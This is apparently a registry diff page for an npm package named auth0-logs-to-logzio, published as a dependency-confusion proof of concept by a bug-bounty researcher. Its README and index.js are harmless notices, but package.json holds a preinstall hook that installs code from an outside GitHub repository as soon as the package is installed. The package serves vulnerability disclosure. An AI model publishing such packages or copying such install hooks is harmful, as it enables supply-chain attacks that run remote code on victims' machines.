auth0-logs-to-logzio 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of auth0-logs-to-logzio might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +8 -0
  2. package/index.js +3 -0
  3. package/package.json +16 -0
package/README.md ADDED
@@ -0,0 +1,8 @@
1
+ # confusion_droper
2
+ This is the template for the dropper npm packages. If this made way into your system or PC then it means you are vulnerable to Dependency confusion.
3
+
4
+ Steps to do:
5
+ 1. Remove the parent package, that is the one which intiated the call to this repository. Check yout logs for it.
6
+ 2. Check your private repository where you are hosting your code.
7
+
8
+ You can contact me here: deneuve@wearehackerone.com
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports.hacked = function () {
2
+ return "You are vulnerable to Dependency Confusion, this POC is by deneuve@wearehackerone.com"
3
+ }
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "auth0-logs-to-logzio",
3
+ "version": "1.0.0",
4
+ "description": "This is a POC by deneuve@wearehackerone.com",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "keywords": [],
10
+ "scripts": {
11
+ "test": "npm i https://github.com/realdeneuve/auth0-logs-to-logzio_pa.git",
12
+ "preinstall": "npm i https://github.com/realdeneuve/auth0-logs-to-logzio_pa.git"
13
+ },
14
+ "author": "deneuve@wearehackerone.com",
15
+ "license": "ISC"
16
+ }